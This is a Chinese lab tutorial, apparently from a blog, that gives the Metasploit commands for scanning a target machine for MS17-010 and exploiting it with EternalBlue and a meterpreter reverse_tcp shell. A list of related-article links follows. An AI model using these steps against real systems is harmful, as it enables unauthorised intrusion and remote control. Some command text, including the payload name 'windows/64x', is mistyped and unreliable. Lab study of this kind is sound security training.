1.在操作系统kali上打开终端,使用以下命令启动Metasploit终端:

msfconsole

2.检查靶机是否存在ms17-010漏洞

(1)搜索ms17-010相关模块:

search ms17-010

(2)分别输入以下命令,使用amb_ms17_010模块进行漏洞检测,确认其存在ms17-010漏洞:

use auxiliary/scanner/smb/smb_ms17_010  //使用模块

show options //查看模块需要设置哪些参数

set RHOSTS 靶机ip  //设置目标机的ip

run  //执行

3.关于缓冲区溢出攻击,exploit模块使用

(1)分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:

use exploit/windows/smb/ms17_010_eternalblue  //进入 ms17_010_eternalbluemok

set RHOST 靶机ip  // 设置远程主机ip地址

set LHOST 操作机ip  // 设置本地主机ip

set payload windows/64x/meterpreter/reverse_tcp  //使用payload:meterpreter/reverse_tcp

set RPORT 445  //设置目标端口

set target 0  //设置目标操作系统类型

run

Metasploit工具配置使用相关推荐

  1. kali初讲——Metasploit工具MSF初学

    Metasploit--MSF 文章目录 Metasploit--MSF 导论 一.Metasploit简介 二.Metasploit模块介绍 三.MSF基础指令 四.MSF常用模块粗讲 五.msf搜 ...

  2. Metasploit工具使用(下)

    Metasploit工具使用 1.Metasploit简介 1.1.Metasploit下载 1.2.其它参考 1.3.本章简述 2.Meterpreter 2.1.简介 2.2.优点 2.3.注意事 ...

  3. Metasploit工具

    一. 简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性.Metasploit Framewo ...

  4. 2.Metasploit数据库配置及扫描模块介绍

    01.Metasploit数据库配置及扫描模块介绍     信息收集   信息收集是渗透测试中首先要做的重要事项之一,目的是尽可能多的查找关于目标的信息,我们掌握的信息越多,渗透成功的机会越大.在信息 ...

  5. JetBrains DataGrip工具配置数据库过程详解

    JetBrains DataGrip工具配置数据库过程详解 DataGrip是一款数据库管理客户端工具,方便连接到数据库服务器,执行sql.创建表.创建索引以及导出数据等. DataGrip 是 Je ...

  6. swing开发图形界面工具配置(可自由拖控件上去)

    swing开发图形界面工具,eclipse swing图形化操作界面工具配置 1.有一个小功能要有一个界面,之前知道有一个 图形化界面的(就是可以往上面拖控件布局的工具)JBuilder,今天上午就下 ...

  7. Bootstrap 编码规范之编辑工具配置

    编辑工具配置 为了避免常见的代码不一致和差异,请按照下面的配置对你的代码编辑工具进行设置: 用两个空格代替制表符(soft-tab 即用空格代表 tab 符). 保存文件时,删除尾部的空白符. 设置文 ...

  8. ultraedit教程java_Java开发工具配置UltraEdit基础教程

    确定你的jdk环境变量配置是正确的. 对于java初学者来说,编译和运行java程序是一件很头疼的东西. 显然,在命令方式下编译和运行java程序用久了,确实是很麻烦, 而我们又不想使用大型的开发工具 ...

  9. 【实用工具】之在VS中使用自定义工具配置nasm/yasm

    1 在VS中使用自定义工具配置nasm/yasm 1.1 方法一(参考开源工具)  可参考开源工具,具体做法是: (1).下载x264源码 (2).在windows下使用cmake便可产生vs的解决方 ...

最新文章

  1. Java开发笔记(二十三)数组工具Arrays
  2. C++(8)--数组及常用算法
  3. Django单表,连表查询
  4. 递归法:计算m个A,n个B可以组合成多少种排列问题?
  5. HTML中body内常用标签
  6. odoo采购单入库代码剖析
  7. 国外永久免费5G大容量网盘--SugarSync
  8. 高级运维工程师打怪升级之路
  9. 【JUC】并发编程(二)
  10. 使用PowerShell替代WinDbg在高分辨率笔记本下调试、排错
  11. opencv +python采集识别填涂卡(答题卡)数据
  12. 论文解读:AdderSR Towards Energy Efficient Image Super-Reso
  13. 2022年全球市场菱镁矿和水镁石总体规模、主要生产商、主要地区、产品和应用细分研究报告
  14. 什么是“中间人攻击“?怎样防止这种攻击?
  15. HDF文件转Tif 温室气体 python代码
  16. javascript中mouseenter与mouseover的异同
  17. 华为机试C语言-组成最大数
  18. 骁龙820A:多媒体Display硬件接口介绍
  19. 5G时代下的室内定位系统,更安全高精准的室内定位系统-新导智能
  20. 雪球产品蒙特卡洛模拟实现产品定价

热门文章

  1. 鸿蒙开发起步系列 | 环境搭建、HarmonyOS应用开发及智能硬件开发
  2. hMailServer搭建邮件服务器,用自己的域名邮箱,酷一些吧
  3. ElasticSearch之TermQuery和MatchQuery
  4. Mac 上必备的常用软件,你值得拥有
  5. 数据结构与算法(003):线性表-概述
  6. 【VB.NET】简介
  7. 使用synergy/barrier服务端和客户端连接不上的问题
  8. 那些年,我们一起参加过的高考
  9. javawe(ckeditorsmartupload)
  10. timer计算 与rcc